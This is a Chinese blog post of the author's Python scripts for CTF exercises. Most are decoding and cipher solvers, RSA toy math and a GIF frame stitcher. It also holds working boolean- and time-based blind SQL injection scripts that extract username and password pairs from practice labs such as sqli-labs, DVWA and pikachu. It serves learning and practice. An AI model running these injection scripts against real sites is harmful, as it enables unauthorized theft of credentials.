python 写的一些ctf脚本
2024-05-15 03:28:04
python 写的一些ctf题脚本记录
文章目录
- python 写的一些ctf题脚本记录
- misc
- 16进制
- 凯撒
- 4进制
- 置换密码
- Unicode
- web计算
- rsa
- base64实现
- sql注入布尔
- gif图片帧拼接
misc
import base64
c = base64.b64decode("XlNkVmtUI1MgXWBZXCFeKY+AaXNt")
for i in c:print(chr((i-16) ^ 32), end="")
import base64
str = "JiM3NjsmIzEyMjsmIzY5OyYjMTIwOyYjNzk7JiM4MzsmIzU2OyYjMTIwOyYjNzc7JiM2ODsmIzY5OyYjMTE4OyYjNzc7JiM4NDsmIzY1OyYjNTI7JiM3NjsmIzEyMjsmIzEwNzsmIzUzOyYjNzY7JiMxMjI7JiM2OTsmIzEyMDsmIzc3OyYjODM7JiM1NjsmIzEyMDsmIzc3OyYjNjg7JiMxMDc7JiMxMTg7JiM3NzsmIzg0OyYjNjU7JiMxMjA7JiM3NjsmIzEyMjsmIzY5OyYjMTIwOyYjNzg7JiMxMDU7JiM1NjsmIzEyMDsmIzc3OyYjODQ7JiM2OTsmIzExODsmIzc5OyYjODQ7JiM5OTsmIzExODsmIzc3OyYjODQ7JiM2OTsmIzUwOyYjNzY7JiMxMjI7JiM2OTsmIzEyMDsmIzc4OyYjMTA1OyYjNTY7JiM1MzsmIzc4OyYjMTIxOyYjNTY7JiM1MzsmIzc5OyYjODM7JiM1NjsmIzEyMDsmIzc3OyYjNjg7JiM5OTsmIzExODsmIzc5OyYjODQ7JiM5OTsmIzExODsmIzc3OyYjODQ7JiM2OTsmIzExOTsmIzc2OyYjMTIyOyYjNjk7JiMxMTk7JiM3NzsmIzY3OyYjNTY7JiMxMjA7JiM3NzsmIzY4OyYjNjU7JiMxMTg7JiM3NzsmIzg0OyYjNjU7JiMxMjA7JiM3NjsmIzEyMjsmIzY5OyYjMTE5OyYjNzc7JiMxMDU7JiM1NjsmIzEyMDsmIzc3OyYjNjg7JiM2OTsmIzExODsmIzc3OyYjODQ7JiM2OTsmIzExOTsmIzc2OyYjMTIyOyYjMTA3OyYjNTM7JiM3NjsmIzEyMjsmIzY5OyYjMTE5OyYjNzc7JiM4MzsmIzU2OyYjMTIwOyYjNzc7JiM4NDsmIzEwNzsmIzExODsmIzc3OyYjODQ7JiM2OTsmIzEyMDsmIzc2OyYjMTIyOyYjNjk7JiMxMjA7JiM3ODsmIzY3OyYjNTY7JiMxMjA7JiM3NzsmIzY4OyYjMTAzOyYjMTE4OyYjNzc7JiM4NDsmIzY1OyYjMTE5Ow=="
b_str = base64.b64decode(str.encode("utf-8"))s = b_str.decode()
l = s.replace("&#", "")[0:-1].split(";")new_s = ''
for i in l:new_s += chr(int(i))b_str = base64.b64decode(new_s.encode("utf-8"))s = b_str.decode()
l = s[1:].split("/")new_s = ''
for i in l:new_s += chr(int(i))
print(new_s)
import base64
s = '升益艮归妹井萃旅离旅困未济屯未济中孚未济升困噬嗑鼎震巽噬嗑解节井萃离未济蒙归妹大畜无妄解兑临睽升睽未济无妄遁涣归妹'
dic = {'坤': '000000', '剥': '000001', '比': '000010', '观': '000011', '豫': '000100', '晋': '000101', '萃': '000110', '否': '000111', '谦': '001000', '艮': '001001', '蹇': '001010', '渐': '001011', '小过': '001100', '旅': '001101', '咸': '001110', '遁': '001111', '师': '010000', '蒙': '010001', '坎': '010010', '涣': '010011', '解': '010100', '未济': '010101', '困': '010110', '讼': '010111', '升': '011000', '蛊': '011001', '井': '011010', '巽': '011011', '恒': '011100', '鼎': '011101', '大过': '011110', '姤': '011111','复': '100000', '颐': '100001', '屯': '100010', '益': '100011', '震': '100100', '噬嗑': '100101', '随': '100110', '无妄': '100111', '明夷': '101000', '贲': '101001', '既济': '101010', '家人': '101011', '丰': '101100', '离': '101101', '革': '101110', '同人': '101111', '临': '110000', '损': '110001', '节': '110010', '中孚': '110011', '归妹': '110100', '睽': '110101', '兑': '110110', '履': '110111', '泰': '111000', '大畜': '111001', '需': '111010', '小畜': '111011', '大壮': '111100', '大有': '111101', '夬': '111110', '乾': '111111'}
l = []
k = 0 # 两个字符的标志位
for i in range(len(s)):if k == 1:k = 0continuetry:l.append(dic[s[i]])except:l.append(dic[s[i]+s[i+1]])k = 1ss = ''.join(l)# print(ss)enc = ''
for i in range(0, len(ss), 8):enc += chr(eval('0b'+ss[i:i+8]))# print(enc)s = base64.b64decode(enc).decode()# print(s)def encrypt4(enc):temp = ''offset = 5for i in range(len(enc)):temp += chr(ord(enc[i])-offset-i)return(temp)def decrypt4(enc):temp = ''offset = 5for i in range(len(enc)):temp += chr(ord(enc[i])+offset+i)return(temp)a, b = 5, 7def encrpyt5(flag):enc = ''for i in flag:enc += chr((a*(ord(i)-97)+b) % 26+97)return(enc)def decrypt5(flag):enc = ''for i in flag:for k in range(20):if (ord(i) - 97 - b+26*k) % a == 0:enc += chr((ord(i) - 97 - b + 26 * k) // a + 97)breakreturn(enc)print(decrypt5(decrypt4(s)))
16进制
str = "61666374667B317327745F73305F333435797D"
for i in range(0, len(str), 2):print(chr(int("0x"+str[i:i+2], 16)), end="")
str = "0x00000039 0x00000034 0x00000034 0x00000037 0x0000007b 0x00000079 0x0000006f 0x00000075 0x0000005f 0x00000061 0x00000072 0x00000065 0x0000005f 0x00000061 0x0000006e 0x0000005f 0x00000069 0x0000006e 0x00000074 0x00000065 0x00000072 0x0000006e 0x00000061 0x00000074 0x00000069 0x0000006f 0x0000006e 0x00000061 0x0000006c 0x0000005f 0x0000006d 0x00000079 0x00000073 0x00000074 0x00000065 0x00000072 0x00000079 0x0000007d"
for i in str.split():print(chr(int(i, 16)), end="")
凯撒
from Crypto.Util.number import *str = 16074357572745018593418837326290993512421736655307780242162599660198598253230550168811761868953242350136362894008095983571749530656901163555918436741973772511575306
passwd = long_to_bytes(str)
# Guvf vf gur cnffjbeq lbh arrq sbe gur MVC svyr: synt{efnZ0erQ33crE}
str = passwd.decode()def change(key, str):result = ""for i in str:if (i.islower()):if((ord(i)+key) > 122):result += chr(ord(i)+key-26)else:result += chr(ord(i)+key)elif(i.isupper()):if((ord(i)+key) > 90):result += chr(ord(i)+key-26)else:result += chr(ord(i)+key)else:result += ireturn resultfor i in range(26):print(change(i, str))import base64
str = "CpakC3wpCpCpOZCpCpBwCpCpCl1pCpCpiT=="def change(key, str):result = ""for i in str:if (i.islower()):if((ord(i)+key) > 122):result += chr(ord(i)+key-26)else:result += chr(ord(i)+key)elif(i.isupper()):if((ord(i)+key) > 90):result += chr(ord(i)+key-26)else:result += chr(ord(i)+key)else:result += ireturn resultfor i in range(26):base_str = change(i, str)try:s=base64.b64decode(base_str)print(s.decode())except:pass
4进制
str = "1212 1230 1201 1213 1323 1012 1233 1311 1302 1202 1201 1303 1211 301 302 303 1331"
print("".join([chr(int(i, 4)) for i in str.split()]))
置换密码
import base64str = "Lrg|{R6{{QQ%O@pOjkiuP*YDuL_tzgNkvpePEu2SNlsKp"
str = base64.b85decode(str).decode() # CLF{TCAASISCLWASPSOEDARRIETENRS}INTG
l = [str[i:i+6] for i in range(0, len(str), 6)]
print("".join([i[0]+i[4]+i[2]+i[3]+i[5]+i[1] for i in l]))
str = "lfe{agdf7244bb47cd310b7b1d71e01c9e6d}c@@@@"l = [str[i:i+6] for i in range(0, len(str), 6)]for i in l:print(i)print("".join([i[1]+i[0]+i[4]+i[5]+i[3]+i[2] for i in l]))
Unicode
str = "0066006c00610067007b964452a096905199007d"
print("".join(["\\u"+str[i:i+4] for i in range(0, len(str), 4)]))print(u'\u0066\u006c\u0061\u0067\u007b\u9644\u52a0\u9690\u5199\u007d')
web计算
import requests
from lxml import etree
url = "https://1360-b7e729ae-1747-44c2-bb53-e5f037516e48.do-not-trust.hacking.run/"s = requests.Session()
r = s.get(url)
data = r.content.decode()
html = etree.HTML(data)str = html.xpath("//p/text()")[1]payload = {'result': eval(str), 'submit': '提交'}
r = s.post(url, data=payload)
print(r.text)
import re
import requestsurl = "https://1360-fc9f2303-ec72-4f3d-a7bc-67e45ef7c32d.do-not-trust.hacking.run/"s = requests.Session()
r = s.get(url).text
str = eval(re.findall(r'v>(.*)=', r)[0])
data = {'value': str}
r = s.post(url, data=data)
print(r.text)
rsa
import gmpy2e = 13
p = 7
q = 11m = 71 # 明文n = p * q
phi = (p-1)*(q-1) # 求φ(n)
d = gmpy2.invert(e, phi) # 解密指数dc = pow(m, e, n) # c = m^e mod nprint(c) # 15import gmpy2e = 13
p = 7
q = 11c = 15 # 密文n = p * q
phi = (p-1)*(q-1) # 求φ(n)
d = gmpy2.invert(e, phi) # 解密指数dm = pow(c, d, n) # m = c^d mod nprint(m) # 71base64实现
l = "A B C D E F G H I J K L M N O P Q R S T U V W X Y Z a b c d e f g h i j k l m n o p q r s t u v w x y z 0 1 2 3 4 5 6 7 8 9 + /".split()ll = []
for i in range(len(l)):t = bin(i)[2:]if(len(t) != 6):t = "0"*(6-len(t))+tll.append(t)d = {}
for i in range(len(l)):d[l[i]] = ll[i]def xiao_e_base64(str):b_str = ""temp = ""for i in str:b = bin(ord(i))[2:]if(len(b) != 8):b_str += "0"*(8-len(b))+belse:b_str += bf = len(b_str) % 3b_str += "000000"*fstr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"for i in range(0, len(b_str), 6):if("1" in b_str[i:i+6]):temp += str[int(b_str[i:i+6], 2)]return temp+"="*fdef xiao_d_base64(str):b_str = ""temp = ""for i in str:if(i == "="):b_str += "000000"else:b_str += d[i]for i in range(0, len(b_str), 8):temp += chr(int(b_str[i:i+8], 2))return tempprint(xiao_e_base64("Tr0y3uew"))
print(xiao_d_base64("VHIweTN1ZXc="))import base64d = {0: 'J', 1: 'K', 2: 'L', 3: 'M', 4: 'N', 5: 'O', 6: 'x', 7: 'y', 8: 'U', 9: 'V', 10: 'z', 11: 'A', 12: 'B', 13: 'C', 14: 'D', 15: 'E', 16: 'F', 17: 'G', 18: 'H', 19: '7', 20: '8', 21: '9', 22: 'P', 23: 'Q', 24: 'I', 25: 'a', 26: 'b', 27: 'c', 28: 'd', 29: 'e', 30: 'f', 31: 'g', 32: 'h',33: 'i', 34: 'j', 35: 'k', 36: 'l', 37: 'm', 38: 'W', 39: 'X', 40: 'Y', 41: 'Z', 42: '0', 43: '1', 44: '2', 45: '3', 46: '4', 47: '5', 48: '6', 49: 'R', 50: 'S', 51: 'T', 52: 'n', 53: 'o', 54: 'p', 55: 'q', 56: 'r', 57: 's', 58: 't', 59: 'u', 60: 'v', 61: 'w', 62: '+', 63: '/', 64: '='}
l = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', 'a', 'b', 'c', 'd', 'e','f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '+', '/']
str = 'FlZNfnF6Qol6e9w17WwQQoGYBQCgIkGTa9w3IQKw'll = [l[i] for j in str for i in range(64) if j == d[i]]# ll=[]
# for j in str:
# for i in range(64):
# if j == d[i]:
# ll.append(l[i])str = "".join([i for i in ll])print(base64.b64decode(str))
sql注入布尔
import requestsurl = "http://xiu.com/sqli/Less-5/?id=1"is_ture = "You are in......"for x in range(1, 100):r = requests.get(url+f"'and (select count(concat(username,'@',password)) from users)={x} -- +")if(is_ture in r.text):break
for j in range(0, x):for length in range(1, 100):r = requests.get(url+f"'and (select length(concat(username,'@',password)) from users limit {j},1)={length} -- +")if(is_ture in r.text):breakfor k in range(1, length+1):min = 32max = 127while abs(max - min) > 1:mid = (max + min)//2r = requests.get(url+f"\' and ascii(substr((select concat(username,\"@\",password) from users limit {j},1),{k},1))>{mid} -- +")if(is_ture in r.text):min = midelse:max = midprint(chr(max), end="")print()import requests
url = "http://xiu.com/DVWA/vulnerabilities/sqli_blind/?id=1"
suffix = "&Submit=Submit#"is_ture = "User ID exists in the database."table = "users"
columns1 = "first_name"
columns2 = "password"cookies = 'security=low; bdshare_firstime=1638626761530; PHPSESSID=h6aumin31bcur15esl4o64ju61'
cookie = {cookie.split("=")[0]: cookie.split("=")[1] for cookie in cookies.split(";")}for x in range(1, 100):payload = f"'and (select count(concat({columns1},'@',{columns2})) from {table})={x} -- +{suffix}"r = requests.get(url+payload, cookies=cookie)if(is_ture in r.text):break
for j in range(0, x):for length in range(1, 100):payload = f"'and (select length(concat({columns1},'@',{columns2})) from {table} limit {j},1)={length} -- +{suffix}"r = requests.get(url+payload, cookies=cookie)if(is_ture in r.text):breakfor k in range(1, length+1):min = 32max = 127while abs(max - min) > 1:mid = (max + min)//2payload = f"' and ascii(substr((select concat({columns1},\"@\",{columns2}) from {table} limit {j},1),{k},1))>{mid} -- +{suffix}"r = requests.get(url+payload, cookies=cookie)if(is_ture in r.text):min = midelse:max = midprint(chr(max), end="")print()import requestsurl = "http://xiu.com/sqli/Less-5/?id=1"chars = '@abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_.0123456789-'
is_ture = "You are in......"for x in range(1, 100):r = requests.get( url+f"'and (select count(concat(username,'@',password)) from users)={x} -- +")if(is_ture in r.text):break
for j in range(0, x):for length in range(1, 100):r = requests.get( url+f"'and (select length(concat(username,'@',password)) from users limit {j},1)={length} -- +")if(is_ture in r.text):breakfor k in range(1, length+1):for i in chars:r = requests.get(url+f"\' and ascii(substr((select concat(username,\"@\",password) from users limit {j},1),{k},1))={ord(i)} -- +")if(is_ture in r.text):print(i, end="")breakprint()import requests
from time import time
url = "http://xiu.com/sqli/Less-5/?id=1"chars = '@abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_.0123456789-'for x in range(1, 100):t1=time()r = requests.get(url+f"'and if((select count(concat(username,'@',password)) from users)={x},sleep(1),1) -- +")t2=time()if((t2-t1)>1):breakfor j in range(0, x):for length in range(1, 100):t1 = time()r = requests.get(url+f"'and if((select length(concat(username,'@',password)) from users limit {j},1)={length},sleep(1),1) -- +")t2 = time()if((t2-t1) > 1):breakfor k in range(1, length+1):for i in chars:t1 = time()r = requests.get( url+f"' and if(ascii(substr((select concat(username,\"@\",password) from users limit {j},1),{k},1))={ord(i)},sleep(1),1) -- +")t2 = time()if((t2-t1) > 1):print(i, end="")breakprint()import requests
from time import timeurl = "http://xiu.com/pikachu/vul/sqli/sqli_blind_b.php?name=vince"
suffix = "&submit=%E6%9F%A5%E8%AF%A2"sleep_time = 0.5table = "users"
columns1 = "username"
columns2 = "password"cookies = '='
cookie = {cookie.split("=")[0]: cookie.split("=")[1] for cookie in cookies.split(";")}for x in range(1, 100):t1 = time()payload = f"'and if((select count(concat({columns1},'@',{columns2})) from {table})={x},sleep({sleep_time}),1) -- +{suffix}"r = requests.get(url+payload, cookies=cookie)t2 = time()if((t2-t1) > sleep_time):breakfor j in range(0, x):for length in range(5, 100):t1 = time()payload = f"'and if((select length(concat({columns1},'@',{columns2})) from {table} limit {j},1)={length},sleep({sleep_time}),1) -- +{suffix}"r = requests.get(url+payload, cookies=cookie)t2 = time()if((t2-t1) > sleep_time):breakfor k in range(1, length+1):min = 32max = 127while abs(max - min) > 1:mid = (max + min)//2t1 = time()payload = f"' and if(ascii(substr((select concat({columns1},\"@\",{columns2}) from {table} limit {j},1),{k},1))>{mid},sleep({sleep_time}),1) -- +{suffix}"r = requests.get(url+payload, cookies=cookie)t2 = time()# print(url+payload)if((t2-t1) > sleep_time):min = midelse:max = midprint(chr(max), end="")print()gif图片帧拼接
from PIL import Imageim = Image.open('file.gif')# 分离
for i in range(770):# 在给定的文件序列中查找指定的帧。如果查找超越了序列的末尾,则产生一个EOFError异常。# 当文件序列被打开时,PIL库自动指定到第0帧上。im.seek(i)im.save('123/'+str(i)+'.png') # 保存在123的目录中new_one = Image.new('RGB', (770, 432))# 拼接
for j in range(770):ima = Image.open('123/'+str(j)+'.png') # 打开123目录# 将一张图粘贴到另一张图像上。变量box或者是一个给定左上角的2元组,或者是定义了左,上,右和下像素坐标的4元组,或者为空(与(0,0)一样)。# 如果给定4元组,被粘贴的图像的尺寸必须与区域尺寸一样。如果模式不匹配,被粘贴的图像将被转换为当前图像的模式。new_one.paste(ima, (j, 0, j+1, 432))# 保存
new_one.save("flag.png")
python 写的一些ctf脚本相关推荐
- python接收微信消息_【Python写微信防撤回脚本】02 接收记录聊天信息
上一期我们安装好了ItChat,并且学会用它登录微信.想知道它还能做什么?往下滑吧~ 接收好友信息 利用ItChat登录微信之后,我们就可以自动记录好友发来的信息. 话不多说,直接上代码: impor ...
- python怎么写测试脚本语言_手把手带你,用Python写一个Monkey自动化测试脚本!!!...
一.为什么需要一个测试脚本? 之前讲解了 Android Monkey 命令的使用方式,今天趁着还热乎就手把手用 Monkey 写一个压力测试的脚本.还不了解什么是 Monkey 的,可以看看之前的文 ...
- 用python写一个排班脚本
好的,我们可以使用 Python 来写一个排班脚本.首先,我们需要定义一些变量来存储排班信息,比如每个员工的名字.可以工作的时间段等. 下面是一个简单的例子,假设我们有三个员工,他们的名字分别是 &q ...
- 用python写一个抢购的脚本
好的,这是用 Python 写的一个抢购的脚本的示例: import requestsdef main():# 在这里输入你的抢购商品的 URLurl = "http://www.examp ...
- 用python写一个抢票脚本
写一个抢票脚本需要了解一些网络爬虫的知识,以及如何使用 Python 进行网络请求. 首先,你需要找到票务网站的 API,并了解其请求方式.请求参数等信息.然后,你可以使用 Python 的第三方库如 ...
- 用python写全自动赛马娘脚本 全自动赛马娘脚本 Auto_Pretty Derby
用python写赛马娘脚本 全自动赛马娘脚本 Auto_Pretty Derby 先放上用脚本训练的成果 其实我一开始有一个想法就用python 去写一个模拟器脚本 但是大家都知道赛马娘 培养具有很多 ...
- python写淘宝秒杀脚本_python实现淘宝秒杀脚本
本文实例为大家分享了python实现淘宝秒杀脚本的具体代码,供大家参考,具体内容如下 1.安装pycharm.网上教程很多. 2.安装 Selenium 库. Selenium支持很多浏览器,我选择的 ...
- python写梦幻西游手游脚本_PyCharm2020.1 全新版本助力你的编程路
人生苦短,我用python,可以说是Python程序员的口头禅了,而Pycharm便是Python编程最广泛使用的编程软件之一:因为其干净利落的界面,超方便的功能特性,许多老师在相关编程课上,也都会使 ...
- python写界面输入测试脚本_python+Selenium自动化测试——输入,点击操作
这是我的第一个真正意思上的自动化脚本. 1.练习的测试用例为: 打开百度首页,搜索"胡歌",然后检索列表,有无"胡歌的新浪微博"这个链接 2.在写脚本之前,需要 ...
最新文章
- Android蓝牙串口程序开发
- Git远程分支的回退
- SAP云平台点了subscription菜单后的roundtrip
- u3d游戏开发视频潭州_游戏美术行业的发展与应用人工智能学院专业介绍及未来前景系列报告会二...
- MFC 改变控件字体大小
- 实验4 C++程序的结构(4学时)
- 少林寺步入 5G 时代!
- 深浅拷贝的使用场景分析
- Linux系统下公式编辑器KLatexFormula
- 2018-2019-2 20189215 《网络攻防技术》第八周作业
- matlab平均脸,BFM使用 - 获取平均脸模型的68个特征点坐标
- php项目怎么配置admin,PHPadmin配置
- 洲际酒店集团大中华区开业酒店突破600家;因美纳中国生产制造基地正式启用 | 美通企业日报...
- API网关,网关平台API流量统一入口
- 华为智慧屏鸿蒙系统缺点,华为智慧屏用户评论及华为智慧屏电视真实体验优缺点情况...
- 出海欧洲《通用数据保护条例》解读,附GDPR白皮书下载
- 基于微信小程序的springboot客运汽车票购票系统源码和论文
- 点评“最好的300款免费软件”
- 微信、百家和U3W自媒体平台三国杀
- GitHub的raw.githubusercontent.com无法链接